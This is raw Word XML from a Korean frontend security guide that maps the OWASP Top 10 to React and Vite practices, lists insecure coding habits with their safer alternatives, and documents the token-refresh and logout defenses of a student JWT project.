      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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공식 명칭 (영문)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한글 명칭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2021판과 비교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A01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Broken Access Control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접근 제어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1위 유지. 2021판 A10(SSRF) 통합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A02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Security Misconfiguration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2021판 A05 → 상승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A03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Supply Chain Failures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소프트웨어 공급망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2021판 A06(취약하고 오래된 구성요소)을 확장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A04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Cryptographic Failures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암호화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2021판 A02 → 하락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A05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Injection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인젝션 (XSS 포함)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2021판 A03 → 하락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A06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Insecure Design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안전하지 않은 설계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2021판 A04 → 하락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A07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Authentication Failures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유지. "Identification and" 삭제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A08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or Data Integrity Failures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소프트웨어·데이터 무결성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유지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A09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Security Logging and Alerting Failures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로깅 및 경고 실패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유지. Monitoring → Alerting</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="81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5E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A10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="31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Mishandling of Exceptional Conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="23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예외 상황 처리 오류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A9602B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2025판 신규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lastRenderedPageBreak/>
        <w:t>5-2. 항목별 프론트엔드 보안 원칙</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>OWASP Top 10은 주로 서버 기준이지만 모든 항목에 프론트엔드가 관여한다.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4"/>
        <w:gridCol w:w="3068"/>
        <w:gridCol w:w="3068"/>
        <w:gridCol w:w="1446"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:tblHeader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프론트엔드에서 나타나는 모습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지켜야 할 원칙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관련 절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A01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접근 제어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숨김을 권한 검사로 착각, 화면에서만 필터링, 경로 조작·오픈 리다이렉트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권한은 서버가 판정, UI는 표시만. 경로값 검증·인코딩, 내부 경로만 이동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 4-3~4-5, 4-12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A02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운영에 소스맵·디버그 코드, 보안 헤더 없음, CORS 전체 허용, VITE_에 비밀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모드별 설정 분리, 보안 헤더, 허용 Origin 명시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4-8, 4-10, 4-11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A03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공급망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취약·악성 npm 패키지, 검증 안 된 CDN 스크립트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lockfile + npm ci, npm audit, 출처 확인, SRI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4-9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A04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암호화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평문 전송, 오래 남는 저장소에 토큰, JWT를 암호화로 오해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HTTPS+HSTS, 짧은 토큰 수명, JWT에 민감정보 금지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4-1, 4-10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A05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인젝션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XSS(dangerouslySetInnerHTML, javascript: URL, eval), 문자열로 만든 URL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JSX escape 유지, DOMPurify, URL 스킴 검사, CSP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4-2, 4-4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A06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안전하지 않은 설계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"프론트에서 숨기면 된다"는 설계, 서버 규칙끼리 상충(검색 API)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설계 단계에서 신뢰 경계와 위협을 함께 검토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2, 3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A07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계정 존재 여부 노출, 클라이언트 잠금 흉내, 비밀번호를 store/URL에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메시지 그대로, 잠금은 서버, 비밀번호는 지역 상태에만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4-1, 4-7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A08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무결성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검증 없는 외부 스크립트, 서버 응답 없이 캐시를 신뢰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SRI, 빌드 파이프라인 보호, 상태는 서버 응답 기준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4-9, 6장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A09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로깅·경고 실패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토큰·비밀번호를 콘솔에, 보안 이벤트(403·잠금)를 사용자에게 숨김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민감정보·오류 객체 통째 로그 금지, 서버 로그가 기준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4-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="14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A10</w:t>
            </w:r>
          </w:p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예외 처리 오류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 시 "열린 쪽"으로 동작, 흰 화면·스택트레이스 노출</w:t>
            </w:r>
          </w:p>
        </w:tc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fail-closed 기본값, Error Boundary, 사용자용 메시지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EB28D7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4-6</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00C40E4F" w:rsidRDefault="00C40E4F">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C40E4F" w:rsidRDefault="00C40E4F">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
        <w:rPr>
          <w:color w:val="2E74B5"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>6. 프론트엔드 작성 시 하지 말아야 할 행동</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t>"기능은 잘 동작하는데 보안이 무너지는" 대표적인 경우다. 코드 리뷰 체크리스트로 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8"/>
        <w:gridCol w:w="3249"/>
        <w:gridCol w:w="2709"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:tblHeader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하지 말 것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왜 위험한가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대신 이렇게</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026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인증 · 토큰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비밀번호·API 키·토큰 하드코딩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번들에 그대로 들어가고 git 기록에 영구히 남는다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서버에만 둔다. 노출 시 즉시 폐기·재발급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localStorage에 토큰·개인정보 저장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탭을 닫아도 남아 XSS 노출 시간이 가장 길다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sessionStorage(교육용) / HttpOnly 쿠키 + 메모리(운영)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토큰을 URL에 넣기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방문 기록·서버 로그·Referer·공유 링크로 유출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Authorization 헤더로만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JWT를 디코드해 권한·만료 확정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서명 검증이 안 돼 조작된 값도 믿게 된다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/me 응답과 401/403 기준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로그아웃 = 브라우저 토큰 삭제만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refreshToken이 서버에서 14일간 유효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 /logout으로 서버 폐기(적용됨)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갱신 실패 뒤 토큰 유지·무한 재시도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탈취 토큰 수명 연장, 서버 부하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재시도 1회, 실패 시 즉시 폐기</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026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접근 제어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권한 검사를 프론트엔드만으로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개발자 도구로 조건을 우회하면 뚫린다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서버가 다시 검사(3장)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버튼 숨김으로 API 보호를 끝냄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토큰만 있으면 API를 직접 호출한다(검색 API)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 권한 규칙 확인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데이터를 받아 화면에서 걸러 표시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네트워크 탭에 전부 보인다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서버가 필요한 것만 응답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403/404를 무시하고 캐시를 믿기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삭제·권한 변경된 데이터를 계속 보여준다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캐시 비우고 서버 메시지 표시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confirm만으로 민감 동작 확정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확인용 UX일 뿐이다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실제 권한은 서버가 검사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외부에서 받은 주소로 이동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직후 피싱 사이트로 보내는 데 악용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 경로만 허용(4-5)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026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XSS · 인젝션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dangerouslySetInnerHTML / innerHTML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React의 자동 escape를 스스로 끈다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글자로 출력. 불가피하면 DOMPurify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 URL을 href·src에 그대로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javascript: 스킴으로 코드 실행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http/https만 허용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eval, new Function, setTimeout("문자열")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문자열이 코드로 실행된다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함수를 직접 넘긴다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문자열로 API 경로·쿼리 만들기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경로 조작, 파라미터 주입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encodeURIComponent, params, 형식 검사</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026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로그 · 오류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민감정보 console.log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 콘솔에도 남아 누구나 본다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메시지·상태 코드만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axios 오류 객체 통째로 로그·전송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헤더의 토큰, 본문의 비밀번호·refreshToken 포함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error.message, status만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스택트레이스·내부 오류를 화면에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 구조가 공격 단서가 된다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사용자용 문구 + Error Boundary</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9026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빌드 · 배포 · 의존성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VITE_ 환경변수에 비밀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번들에 문자열로 박힌다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공개돼도 되는 값만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운영에 소스맵·디버그 코드 배포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원본 소스·주석·내부 정보 노출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sourcemap 끄기, 모드별 설정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CORS를 보안 끄기나 "*"로 해결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다른 사이트가 응답을 읽게 된다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 Origin 명시, Vite proxy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출처 확인 없이 설치, audit 무시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악성·취약 패키지가 번들에 포함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lockfile + npm ci + audit</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00275A50" w:rsidRPr="00C40E4F">
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3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운영을 HTTP로 배포</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="32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네트워크에서 토큰이 보인다</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="27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C40E4F" w:rsidRDefault="00CA1CCE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 + HSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="005120DE" w:rsidRDefault="005120DE">
      <w:pPr>
        <w:spacing w:after="120"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005120DE" w:rsidRDefault="005120DE">
      <w:pPr>
        <w:widowControl/>
        <w:wordWrap/>
        <w:autoSpaceDE/>
        <w:autoSpaceDN/>
      </w:pPr>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:spacing w:before="300" w:after="150"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>7. 이 프로젝트가 실제로 적용한 방어와 개선할 점</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EC19AC" w:rsidRDefault="00CA1CCE">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:before="240" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:t>7-1. 적용된 방어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4"/>
        <w:gridCol w:w="6902"/>
      </w:tblGrid>
      <w:tr w:rsidR="00275A50" w:rsidTr="00EF6079">
        <w:trPr>
          <w:tblHeader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방어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위치 · 내용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토큰 자동 만료 처리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  <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/client.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:147</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">-166(401 처리, </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>notifyExpired</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>() 호출 163행) → App.jsx:72-74(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>handleExpired</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> → logout()·로그인 이동)</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="005120DE" w:rsidRPr="008A4771" w:rsidRDefault="005120DE">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005120DE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Pr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>으로도 복구할 수 없는 401(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005120DE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Pr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 없음/만료/재사용 감지)이면 client.js가 토큰을 지우고 "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>auth</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>:expired</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>" 이벤트만 외친다. client.js는 화면 이동(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>useNavigate</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">)을 할 수 없고 store를 직접 import하면 순환 참조가 생기므로, 실제 로그아웃 처리와 로그인 화면 이동은 이 이벤트를 듣는 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>App.jsx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005120DE">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>가 대신 수행한다.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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>위변조된</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 토큰 거부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F7158" w:rsidRDefault="00FE0C9A" w:rsidP="00DF7158">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C9A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>Student_JWT</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE0C9A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>의 security/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C9A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>jwt</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE0C9A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/JwtAuthenticationFilter.java 58행(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00FE0C9A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>validateToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00FE0C9A">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">)·65행(서명 오류 catch) </w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00EC19AC" w:rsidRPr="00DF7158" w:rsidRDefault="00DF7158" w:rsidP="00DF7158">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">: </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>sessionStorage</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve">의 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>accessToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve">을 직접 조작해도 서명 검증에 걸려 즉시 401이 반환된다. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>프론트엔드는</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd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 xml:space="preserve"> 이 401이 "변조"인지 "단순 만료"인지 구분하지 않고 동일하게 토큰 재발급(refresh) 절차를 시도하므로, 변조된 토큰이 인증을 통과하는 것이 아니라 서버가 거부한 뒤 통상적인 만료 처리 흐름(401 수신 시 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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 xml:space="preserve">으로 조용히 </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>재인증을</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidR="00FE0C9A" w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 시도하는 경로)을 타는 것일 뿐이다.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중복 갱신 방지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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/client.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:96</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>refreshingPromise</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 선언), 98-113(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>refreshAccessToken</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>())</w:t>
            </w:r>
            <w:r w:rsidR="003A44F6">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="003A44F6" w:rsidRPr="00DF7158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="003A44F6" w:rsidRPr="00DF7158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r w:rsidR="003A44F6" w:rsidRPr="00DF7158">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>최초의</w:t>
            </w:r>
            <w:r w:rsidR="003A44F6" w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> /refresh 호출 하나만 실제로 내보내고, 그 "진행 중인 약속(Promise)"을 변수에 담아둡니다. 같은 타이밍에 401을 받은 다른 요청들은 새로 /refresh를 호출하지 않고 이미 진행 중인 그 하나의 Promise를 함께 기다렸다가 같은 결과(새 토큰)를 받아씁니다. 즉, "동시 다발적 401 → 동시 다발적 refresh 호출"을 "동시 다발적 401 → 단 1회의 refresh 호출"로 합쳐주는 역할입니다.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무한 재시도 방지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DF7158" w:rsidRDefault="00CA1CCE" w:rsidP="00DF7158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proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>/client.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>:140</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>-141(</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>isLoginRequest·isRefreshRequest</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="008A4771">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> 제외), 147(_retried 검사), 152(_retried = true)</w:t>
            </w:r>
            <w:r w:rsidR="00DF7158">
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:br/>
            </w:r>
            <w:r w:rsidR="00DF7158" w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>: /refresh 자신의 401은 "</w:t>
            </w:r>
            <w:proofErr w:type="spellStart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>도 만료/무효"라는 뜻이다. "refresh가 401 → refresh를 다시 호출 → 또 401 → 또 호출</w:t>
            </w:r>
            <w:proofErr w:type="gramStart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>...</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd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 xml:space="preserve">"이 되어, 같은 요청(/refresh) 안에서 자기 자신을 끝없이 다시 부르는 재귀 루프가 생긴다. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart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="00DF7158" w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>이 이미 망가졌으니 다시 불러도 절대 성공할 수 없는데 계속 시도하게 되는 셈이라, 반드시 여기서 끊고 바로 로그아웃 경로(161-165행)로 보내야 한다.</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00DF7158" w:rsidRPr="008A4771" w:rsidRDefault="00DF7158" w:rsidP="00DF7158">
            <w:pPr>
              <w:spacing w:after="20"/>
              <w:rPr>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>: _retried: 같은 일반 요청이 "갱신→재시도"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>를</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 두 번 이상 반복하는 것을 막는다. </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>요청마다</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> "이미 한 번 재시도했는가"</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>를</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00DF7158">
              <w:rPr>
                <w:color w:val="1F4E79" w:themeColor="accent1" w:themeShade="80"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> 표시해 두 번째부터 차단.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로그아웃 시 서버 폐기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rFonts w:hint="eastAsia"/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store/authStore.js</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
